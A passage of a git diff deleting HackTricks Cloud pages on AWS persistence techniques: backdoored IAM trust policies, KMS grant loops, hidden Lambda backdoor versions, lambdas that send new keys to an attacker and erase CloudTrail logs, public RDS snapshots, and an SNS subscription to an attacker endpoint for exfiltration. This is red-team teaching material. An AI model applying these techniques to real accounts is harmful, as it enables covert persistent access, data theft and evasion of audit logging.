-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### Modify Resource Policy / Security Groups - -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. - -### Create Access Point - -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md deleted file mode 100644 index accebf399..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md +++ /dev/null @@ -1,78 +0,0 @@ -# AWS - IAM Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### Common IAM Persistence - -* Create a user -* Add a controlled user to a privileged group -* Create access keys (of the new user or of all users) -* Grant extra permissions to controlled users/groups (attached policies or inline policies) -* Disable MFA / Add you own MFA device -* Create a Role Chain Juggling situation (more on this below in STS persistence) - -### Backdoor Role Trust Policies - -You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": [ - "*", - "arn:aws:iam::123213123123:root" - ] - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -### Backdoor Policy Version - -Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group. - -### Backdoor / Create Identity Provider - -If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md deleted file mode 100644 index dbf4efa29..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md +++ /dev/null @@ -1,66 +0,0 @@ -# AWS - KMS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For mor information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Grant acces via KMS policies - -An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information. - -### Eternal Grant - -Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key. - -Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated. - -(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant) - -```bash -# To generate grants, generate 10 like this one -aws kms create-grant \ - --key-id \ - --grantee-principal \ - --operations "CreateGrant" "Decrypt" - -# To monitor grants -aws kms list-grants --key-id -``` - -{% hint style="info" %} -A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md deleted file mode 100644 index 13f2777a8..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md +++ /dev/null @@ -1,90 +0,0 @@ -# AWS - Lambda Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Lambda Layer Persistence - -It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way: - -{% content-ref url="aws-lambda-layers-persistence.md" %} -[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md) -{% endcontent-ref %} - -### Lambda Extension Persistence - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -### Via resource policies - -It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts: - -
- -### Versions, Aliases & Weights - -A Lambda can have **different versions** (with different code each version).\ -Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\ -This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth. - -
- -### Version Backdoor + API Gateway - -1. Copy the original code of the Lambda -2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST - 1. Call the API gateway related to the lambda to execute the code -3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST. - 1. This will hide the backdoored code in a previous version -4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1::function::1` - 1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario). -5. Select the POST method created and in Actions select **`Deploy API`** -6. Now, when you **call the function via POST your Backdoor** will be invoked - -### Cron/Event actuator - -The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\ -Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**. - -* Every time a new user is created lambda generates a new user key and send it to the attacker. -* Every time a new role is created lambda gives assume role permissions to compromised users. -* Every time new cloudtrail logs are generated, delete/alter them - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md deleted file mode 100644 index aa8a0269f..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md +++ /dev/null @@ -1,69 +0,0 @@ -# AWS - Abusing Lambda Extensions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Extensions - -Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. - -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. - -For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html). - -### External Extension for Persistence, Stealing Requests & modifying Requests - -This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.** - -Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request. - -The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png

- -The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. - -{% hint style="warning" %} -By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. -{% endhint %} - -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. - -

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

- -The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. - -## References - -* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) -* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md deleted file mode 100644 index 77290eacb..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Lightsail Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Download Instance SSH keys & DB passwords - -They won't be changed probably so just having them is a good option for persistence - -### Backdoor Instances - -An attacker could get access to the instances and backdoor them: - -* Using a traditional **rootkit** for example -* Adding a new **public SSH key** -* Expose a port with port knocking with a backdoor - -### DNS persistence - -If domains are configured: - -* Create a subdomain pointing your IP so you will have a **subdomain takeover** -* Create **SPF** record allowing you to send **emails** from the domain -* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md deleted file mode 100644 index 641621662..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - RDS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. - -{% code overflow="wrap" %} -```bash -aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately -``` -{% endcode %} - -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public - -{% code overflow="wrap" %} -```bash -aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md deleted file mode 100644 index c821dbd6a..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - S3 Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## S3 - -For more information check: - -{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} -[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) -{% endcontent-ref %} - -### KMS Client-Side Encryption - -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: - -
- -Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. - -### Using S3 ACLs - -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md deleted file mode 100644 index 9349605bc..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# AWS - Secrets Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Via Resource Policies - -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. - -### Via Secrets Rotate Lambda - -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: - -```python -import boto3 - -def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') - - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) - -def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password - - # Example: Generate a new password - new_secret_value = generate_password() - - return new_secret_value - -def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md deleted file mode 100644 index cb0b70d82..000000000 --- a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ /dev/null @@ -1,107 +0,0 @@ -# AWS - SNS Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: - -```json -{ - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] -} -``` - -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. - -```bash -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP 